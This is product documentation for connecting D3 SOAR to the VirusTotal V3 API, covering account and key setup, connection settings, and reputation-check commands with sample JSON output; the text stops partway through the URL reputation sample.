VirusTotal v3
LAST UPDATED: APR 11, 2025
Overview
VirusTotal is a threat intelligence platform that can aggregate multiple antivirus products and online scan engines to check for viruses that a user's antivirus may have otherwise missed, or verify against any false positives. VirusTotal API version 3 is now the default and the recommended method to integrate and interact with VirusTotal. It greatly improves API version 2, which, for the time being, will not be deprecated. The new version has improved greatly compared to the version 2 of the VirusTotal, which is still available for use at the time this document was written. While some of the endpoints and features are provided to users of the public API, many are restricted to premium users only.
D3 SOAR is providing REST operations to function with VirusTotal V3.
VirusTotal V3 is available for use in:
Known Limitations
VirusTotal’s public API is a free service. Public API constraints and restrictions:
The Public API is limited to 500 requests per day and a rate of 4 requests per minute.
The Public API must not be used in commercial products or services.
The Public API must not be used in business workflows that do not contribute new files.
You are not allowed to register multiple accounts to overcome the aforementioned limitations.
Please refer to Public vs Premium API from VirusTotal’s documentation for more details about the limitations of the public API compared to the premium API.
Connection
To connect to VirusTotal V3 from D3 SOAR, please follow this part to collect the required information below:
Parameter | Description | Example |
Server URL | The VirusTotal server URL. | https://www.virustotal.com |
API Key | The VirusTotal API key to authenticate the API connection. | 0b5********************8e5 |
API Version | The API version to use for the API connection. | v3 |
Permission Requirements
VirusTotal provides both a Public API and a Premium API. The public API is a free service, available for any website or application that is free to consumers. The premium API will be paid, but has no constraints and limitations. D3 SOAR’s commands can have full access to VirusTotal by using Public or Premium APIs, please choose either based on your needs.
The prerequisite for using the API is that you must sign up to the VirusTotal Community. Once you have a valid VirusTotal Community account you will find your personal API key in your personal settings section.
Please refer to Public vs Premium API from VirusTotal’s documentation for more details about the limitations of the public API compared to the premium API.
Configuring VirusTotal V3 to Work with D3 SOAR
Creating a New User Account
Navigate to the VirusTotal signup page at https://www.virustotal.com/gui/join-us.
There are two options to create a new account.
Email Address: Fill in the required fields, agree to the Terms of Service and Privacy Policy, then click Join us.
Continue with Third-Party Account: Select the third-party account you want to use. You will be prompted to sign in to the selected account.
Adding an API Key
Log in to VirusTotal (https://www.virustotal.com/gui/sign-in).
Click on the user profile icon found on the top right corner, then API Key.
Copy the API Key to build a connection with D3 SOAR. VirusTotal allows you to view your API key as many times as you wish. The API key will not change for your account unless you are upgrading to use the premium API key. Click here for more information about VirusTotal’s premium services.
READER NOTE
The API key grants user privileges, Store it securely and never share it.
Configuring D3 SOAR to Work with VirusTotal V3
Log in to D3 SOAR.
Find the VirusTotal V3 integration.
-20241017-234939.png?inst-v=14315ac1-e236-4137-b3db-d5c917e51e5f)
Navigate to Configuration on the top header menu.
Click on the Integration icon on the left sidebar.
Type VirusTotal V3 in the search box to find the integration, then click it to select it.
Click + New Connection, on the right side of the Connections section. A new connection window will appear.
Configure the following fields to create a connection to VirusTotal V3.
-20241017-235005.png?inst-v=14315ac1-e236-4137-b3db-d5c917e51e5f)
Connection Name: The desired name for the connection.
Site: Specifies the site to use the integration connection. Use the drop-down menu to select the site. The Share to Internal Sites option enables all sites defined as internal sites to use the connection. Selecting a specific site will only enable that site to use the connection.
Recipient site for events from connections Shared to Internal Sites: This field appears if you selected Share to Internal Sites for Site to let you select the internal site to deploy the integration connection.
Agent Name (Optional): Specifies the proxy agent required to build the connection. Use the dropdown menu to select the proxy agent from a list of previously configured proxy agents.
Description (Optional): Add your desired description for the connection.
Tenant (Optional): When configuring the connection from a master tenant site, you have the option to choose the specific tenant sites you want to share the connection with. Once you enable this setting, you can filter and select the desired tenant sites from the dropdowns to share the connection.
Configure User Permissions: Defines which users have access to the connection.
Active: Check the tick box to ensure the connection is available for use.
System Reputation Check: Checking one or more reputation check tickboxes will run the corresponding check reputation command(s) under this integration connection to enrich the corresponding artifacts with reputation details.
-20241017-235709.png?inst-v=14315ac1-e236-4137-b3db-d5c917e51e5f)
For example, we are configuring an integration connection named “ConnectionA” with the site “Sandbox”. All IP artifacts from the “Sandbox” site will go through a reputation check using the Check IP Reputation command from that integration. The return data output from running the command will then be used to update the risk level of the artifacts which may affect the risk level of incoming events.
-20241018-000600.png?inst-v=14315ac1-e236-4137-b3db-d5c917e51e5f)
System: This section contains the parameters defined specifically for the integration. These parameters must be configured to create the integration connection.
1. Copy the domain level VirusTotal Server URL. The default value is https://www.virustotal.com.
2. Copy the API Key from the VirusTotal V3 platform (Refer to step 3 of Configuring VirusTotal V3 to Work with D3 SOAR for more on obtaining the API key).
3. The default value of API Version is v3. D3 SOAR currently only supports API v3 for all commands. Please use the default value.Connection Health Check: Updates the connection status you have created. A connection health check is done by scheduling the Test Connection command of this integration. This can only be done when the connection is active.
To set up a connection health check, check the Connection Health Check tickbox. You can customize the interval (minutes) for scheduling the health check. An email notification can be set up after a specified number of failed connection attempts.Enable Password Vault: An optional feature that allows users to take the stored credentials from their own password vault. Please refer to the password vault connection guide if needed.
Test the connection.
-20241017-235314.png?inst-v=14315ac1-e236-4137-b3db-d5c917e51e5f)
Click Test Connection to verify the account credentials and network connection. If the Test Connection Passed alert window appears, the test connection is successful. You will see Passed with a green checkmark appear beside the Test Connection button. If the test connection fails, please check your connection parameters and try again.
Click OK to close the alert window.
Click + Add to create and add the configured connection.
Commands
VirusTotal V3 includes the following executable commands for users to set up schedules or create playbook workflows. With the Test Command, you can execute these commands independently for playbook troubleshooting.
READER NOTE
Please note that the sample data provided for some of the following integration commands may have certain key-value pairs removed. However, the shortened sample data are still proper JSON objects. Some sample data have been shortened and simplified due to their length.
Integration API Note
For more information about the VirusTotal V3 API, please refer to the VirusTotal V3 API reference.
READER NOTE
Certain permissions are required for each command. Please refer to the Permission Requirements and Configuring VirusTotal V3 to Work with D3 SOAR for details.
Check File Reputation
Retrieves reputation information of the File(s).
Input
Input Parameter | Required/Optional | Description | Example |
File Hashes | Required | The list of file hashes to perform the reputation check on. MD5, SHA-1 and SHA256 file hashes are supported. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
{
"data": [
{
"attributes": {
"last_modification_date": 1654003160,
"times_submitted": 930,
"total_votes": {
"harmless": 0,
"malicious": 4
},
"threat_names": [
"Mal/HTMLGen-A"
],
"last_submission_date": 1654002437,
"last_http_response_content_length": 101491,
"last_http_response_headers": {
"X-Powered-By": "Express",
"Transfer-Encoding": "chunked",
"Set-Cookie": "*****; Max-Age=315360000; Domain=*****.com; Path=/; Expires=Fri, 28 May 2032 13:09:32 GMT, lang=en; Domain=*****.com; Path=/; Expires=Wed, 31 May 2023 13:09:32 GMT, lastLang=en; Domain=*****.com; Path=/; Expires=Wed, 31 May 2023 13:09:32 GMT",
"Expires": "Tue, 31 May 2022 13:09:35 GMT",
"Vary": "Accept-Encoding, Origin",
"Server": "*****/***.***.***",
"Connection": "keep-alive",
"ETag": "W/\"*****\"",
"Cache-Control": "no-cache, no-cache",
"Date": "Tue, 31 May 2022 13:09:36 GMT",
"Content-Type": "text/html; charset=utf-8",
"Content-Encoding": "gzip"
},
"reputation": -80,
"tags": [],
"last_analysis_date": 1654002437,
"first_submission_date": 1469079499,
"categories": {
"Sophos": "stocks and trading",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "information technology",
"alphaMountain.ai": "Malicious"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "http://*****.*****.***/",
"trackers": {
"Facebook Custom Audience": [
{
"url": "https://www.facebook.com/tr?id=*****",
"timestamp": 1653953609,
"id": "*****"
}
],
"Google Tag Manager": [
{
"url": "https://www.googletagmanager.com/ns.html?id=*****",
"timestamp": 1654002437,
"id": "*****"
}
],
"Facebook Connect": [
{
"url": "https://connect.facebook.net/en_US/fbevents.js",
"timestamp": 1653953609,
"id": "*****"
}
]
},
"url": "http://*****.*****.***/",
"title": "Altcoin Cryptocurrency Mining Pools —” MinerGate",
"last_analysis_stats": {
"harmless": 80,
"malicious": 3,
"suspicious": 0,
"undetected": 11,
"timeout": 0
},
"last_analysis_results": {},
"html_meta": {
"twitter:creator": [
"@MinerGate"
],
"description": [
"Join MinerGate's cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"twitter:image": [
"https://minergate.com/assets/share.png"
],
"twitter:site": [
"@MinerGate"
],
"MobileOptimized": [
"176"
],
"keywords": [
"main, keywords"
],
"og:image": [
"https://minergate.com/assets/share.png"
],
"viewport": [
"width=device-width, initial-scale=1, minimum-scale=1.0, user-scalable=yes"
],
"og:url": [
"https://*****.*****.***/"
],
"og:title": [
"Altcoin Cryptocurrency Mining Pools —“ MinerGate"
],
"twitter:card": [
"summary_large_image"
],
"twitter:description": [
"Join MinerGate's cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"og:type": [
"article"
],
"og:description": [
"Join MinerGate's cryptocurrency mining pools with 1-click GUI miner. A variety of more than 10 altcoins to mine on dedicated pools with GPU, CPU & ASIC miners. Join our vibrant community of more than a 3.5 million users."
],
"baidu-site-verification": [
"NRDZZtc2p7"
],
"twitter:title": [
"Altcoin Cryptocurrency Mining Pools —“ MinerGate"
],
"google-site-verification": [
"*****"
]
},
"outgoing_links": [
"https://***/***",
"https://***/***",
"https://***/***",
]
},
"type": "url",
"id": "*****",
"riskLevel": 1,
"links": {
"self": "https://www.***/***"
}
}
],
"links": {
"self": "https://www.***/***"
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"MD5s": [
"*****"
],
"SHA1s": [
"*****"
],
"SHA256s": [
"*****"
],
"Reputations": [
-1
],
"RiskLevels": [
"Medium"
]
}In check reputation commands, Return Data converts the risk score from the raw data into D3-defined risk levels as a numerical value (1-5). This will be used to enrich artifacts with reputation information.
SAMPLE DATA
[
{
"md5": "*****",
"sha1": "*****",
"sha256": "*****",
"riskLevel": 4
}
]Provides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No sample data
D3-defined Risk Levels
The table below lists the possible output risk levels with the corresponding return “RiskLevels” under Key Fields:
Return Data | Key Fields “RiskLevels” |
1 | High |
2 | Medium |
3 | Low |
4 | N/A (Default) |
5 | ZeroRisk |
Error Handling
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Check File Reputation failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: File Not Found. |
Error Sample Data Check File Reputation failed. Status Code: 404. Message: File Not Found. |
Check IP Reputation
Retrieves reputation information of the IP(s).
Input
Input Parameter | Required/Optional | Description | Example |
IPs | Required | The list of IPs to perform the reputation check on. Note: Only IPv4 addresses are supported. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
{
"data": [
{
"attributes": {
"regional_internet_registry": "RIPE NCC",
"network": "***.***.***.***/***",
"tags": [],
"country": "RU",
"as_owner": "Kanzas LLC",
"last_analysis_stats": {
"harmless": 77,
"malicious": 3,
"suspicious": 1,
"undetected": 11,
"timeout": 0
},
"asn": *****,
"whois_date": 1652718716,
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "malicious",
"result": "malware",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"ViriBack": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ViriBack"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CRDF"
},
"Fortinet": {
"category": "malicious",
"result": "malware",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ADMINUSLabs"
},
"CyberCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyberCrime"
},
"Juniper Networks": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Juniper Networks"
},
"Heimdal Security": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Heimdal Security"
},
"AutoShun": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "AutoShun"
},
"Trustwave": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Trustwave"
},
"AICC (MONITORAPP)": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AICC (MONITORAPP)"
},
"CyRadar": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CyRadar"
},
"Dr.Web": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Dr.Web"
},
"Emsisoft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Emsisoft"
},
"Abusix": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Abusix"
},
"Webroot": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Webroot"
},
"Avira": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Avira"
},
"securolytics": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "securolytics"
},
"Antiy-AVL": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Antiy-AVL"
},
"Acronis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Acronis"
},
"Quick Heal": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quick Heal"
},
"URLQuery": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "URLQuery"
},
"ESTsecurity-Threat Inside": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESTsecurity-Threat Inside"
},
"Viettel Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Viettel Threat Intelligence"
},
"DNS8": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "DNS8"
},
"benkow.cc": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "benkow.cc"
},
"EmergingThreats": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EmergingThreats"
},
"Chong Lua Dao": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Chong Lua Dao"
},
"Yandex Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Yandex Safebrowsing"
},
"MalwareDomainList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwareDomainList"
},
"Lumu": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Lumu"
},
"zvelo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "zvelo"
},
"Kaspersky": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Kaspersky"
},
"Segasec": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Segasec"
},
"Sucuri SiteCheck": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sucuri SiteCheck"
},
"desenmascara.me": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "desenmascara.me"
},
"URLhaus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "URLhaus"
},
"PREBYTES": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "PREBYTES"
},
"StopForumSpam": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "StopForumSpam"
},
"Blueliv": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Blueliv"
},
"Netcraft": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Netcraft"
},
"ZeroCERT": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ZeroCERT"
},
"Phishing Database": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishing Database"
},
"MalwarePatrol": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalwarePatrol"
},
"MalBeacon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalBeacon"
},
"IPsum": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "IPsum"
},
"Malwared": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Malwared"
},
"BitDefender": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BitDefender"
},
"GreenSnow": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "GreenSnow"
},
"G-Data": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "G-Data"
},
"StopBadware": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "StopBadware"
},
"SCUMWARE.org": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SCUMWARE.org"
},
"malwares.com URL checker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "malwares.com URL checker"
},
"NotMining": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "NotMining"
},
"Forcepoint ThreatSeeker": {
"category": "suspicious",
"result": "suspicious",
"method": "blacklist",
"engine_name": "Forcepoint ThreatSeeker"
},
"Certego": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "Certego"
},
"ESET": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ESET"
},
"Threatsourcing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Threatsourcing"
},
"MalSilo": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "MalSilo"
},
"Nucleon": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Nucleon"
},
"BADWARE.INFO": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BADWARE.INFO"
},
"ThreatHive": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ThreatHive"
},
"FraudScore": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "FraudScore"
},
"Tencent": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Tencent"
},
"Bfore.Ai PreCrime": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Bfore.Ai PreCrime"
},
"Baidu-International": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Baidu-International"
}
},
"reputation": -3,
"last_modification_date": 1654783470,
"total_votes": {
"harmless": 0,
"malicious": 3
},
"continent": "EU",
"whois": "inetnum: ***.***.***.*** - ***.***.***.***\nnetname: ***\***: RU\norg: ***\***: ***\***: ***\***: ALLOCATED PA\nmnt-by: ***\***: ***\***: ***\***: ***\***: 2021-04-30T15:31:31Z\nlast-modified: 2021-04-30T15:31:31Z\nsource: ***\***: ***\***: ***\***: ***\***: ***\***, 1, pom. XV, ***\***: ***\***"
},
"type": "ip_address",
"id": "***.***.***.***",
"riskLevel": 1,
"links": {
"self": "https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***"
}
}
],
"links": {
"self": "https://www.virustotal.com/api/v3/search?query=***.***.***.***"
}
}Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"IPs": [
"***.***.***.***"
],
"Reputations": [
-3
],
"RiskLevels": [
"High"
]
}In check reputation commands, Return Data converts the risk score from the raw data into D3-defined risk levels as a numerical value (1-5). This will be used to enrich artifacts with reputation information.
SAMPLE DATA
[
{
"ip": "***.***.***.***",
"riskLevel": 1
}
]Provides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
No sample data
D3-defined Risk Levels
The table below lists the possible output risk levels with the corresponding return “RiskLevels” under Key Fields:
Return Data | Key Fields “RiskLevels” |
1 | High |
2 | Medium |
3 | Low |
4 | N/A (Default) |
5 | ZeroRisk |
Error Handling
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Check IP Reputation failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: IP Not Found. |
Error Sample Data Check IP Reputation failed. Status Code: 404. Message: IP Not Found. |
Check URL Reputation
Retrieves reputation information of the URL(s).
Input
Input Parameter | Required/Optional | Description | Example |
URLs | Required | The list of URLs to perform the reputation check on. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
{
"data": [
{
"attributes": {
"last_modification_date": 1654003160,
"times_submitted": 930,
"total_votes": {
"harmless": 0,
"malicious": 4
},
"threat_names": [
"Mal/HTMLGen-A"
],
"last_submission_date": 1654002437,
"last_http_response_content_length": 101491,
"last_http_response_headers": {
"X-Powered-By": "Express",
"Transfer-Encoding": "chunked",
"Set-Cookie": "*****; Max-Age=315360000; Domain=minergate.com; Path=/; Expires=Fri, 28 May 2032 13:09:32 GMT, lang=en; Domain=minergate.com; Path=/; Expires=Wed, 31 May 2023 13:09:32 GMT, lastLang=en; Domain=minergate.com; Path=/; Expires=Wed, 31 May 2023 13:09:32 GMT",
"Expires": "Tue, 31 May 2022 13:09:35 GMT",
"Vary": "Accept-Encoding, Origin",
"Server": "nginx/1.17.10",
"Connection": "keep-alive",
"ETag": "W/\"*****\"",
"Cache-Control": "no-cache, no-cache",
"Date": "Tue, 31 May 2022 13:09:36 GMT",
"Content-Type": "text/html; charset=utf-8",
"Content-Encoding": "gzip"
},
"reputation": -80,
"tags": [],
"last_analysis_date": 1654002437,
"first_submission_date": 1469079499,
"categories": {
"Sophos": "stocks and trading",
"BitDefender": "financial",
"Webroot": "Malware Sites",
"Comodo Valkyrie Verdict": "media sharing",
"Forcepoint ThreatSeeker": "information technology",
"alphaMountain.ai": "Malicious"
},
"last_http_response_content_sha256": "*****",
"last_http_response_code": 200,
"last_final_url": "http://*****.*****.***/",
"trackers": {
"Facebook Custom Audience": [
{
"url": "https://www.facebook.com/tr?id=*****",
"timestamp": 1653953609,
"id": "*****"
}
],
"Google Tag Manager": [
{
"url": "https://www.googletagmanager.com/ns.html?id=*****",
"timestamp": 1654002437,
"id": "*****"
}
],
"Facebook Connect": [
{
"url": "https://connect.facebook.net/en_US/fbevents.js",
"timestamp": 1653953609,
"id": "*****"
}
]
},
"url": "http://*****.*****.***/",
"title": "Altcoin Cryptocurrency Mining Pools ??? MinerGate",
"last_analysis_stats": {
"harmless": 80,
"malicious": 3,
"suspicious": 0,
"undetected": 11,
"timeout": 0
},
"last_analysis_results": {
"CMC Threat Intelligence": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CMC Threat Intelligence"
},
"Snort IP sample list": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Snort IP sample list"
},
"0xSI_f33d": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "0xSI_f33d"
},
"Armis": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Armis"
},
"ViriBack": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "ViriBack"
},
"Comodo Valkyrie Verdict": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Comodo Valkyrie Verdict"
},
"PhishLabs": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "PhishLabs"
},
"K7AntiVirus": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "K7AntiVirus"
},
"CINS Army": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "CINS Army"
},
"Cyren": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Cyren"
},
"Quttera": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Quttera"
},
"BlockList": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "BlockList"
},
"OpenPhish": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "OpenPhish"
},
"VX Vault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "VX Vault"
},
"Feodo Tracker": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Feodo Tracker"
},
"Web Security Guard": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Web Security Guard"
},
"Scantitan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Scantitan"
},
"AlienVault": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "AlienVault"
},
"Sophos": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Sophos"
},
"Phishtank": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Phishtank"
},
"EonScope": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "EonScope"
},
"Cyan": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "Cyan"
},
"Spam404": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Spam404"
},
"SecureBrain": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "SecureBrain"
},
"Hoplite Industries": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Hoplite Industries"
},
"CRDF": {
"category": "malicious",
"result": "malicious",
"method": "blacklist",
"engine_name": "CRDF"
},
"Rising": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Rising"
},
"Fortinet": {
"category": "malicious",
"result": "malware",
"method": "blacklist",
"engine_name": "Fortinet"
},
"alphaMountain.ai": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "alphaMountain.ai"
},
"Lionic": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Lionic"
},
"Virusdie External Site Scan": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Virusdie External Site Scan"
},
"Artists Against 419": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Artists Against 419"
},
"Google Safebrowsing": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
"engine_name": "Google Safebrowsing"
},
"SafeToOpen": {
"category": "undetected",
"result": "unrated",
"method": "blacklist",
"engine_name": "SafeToOpen"
},
"ADMINUSLabs": {
"category": "harmless",
"result": "clean",
"method": "blacklist",
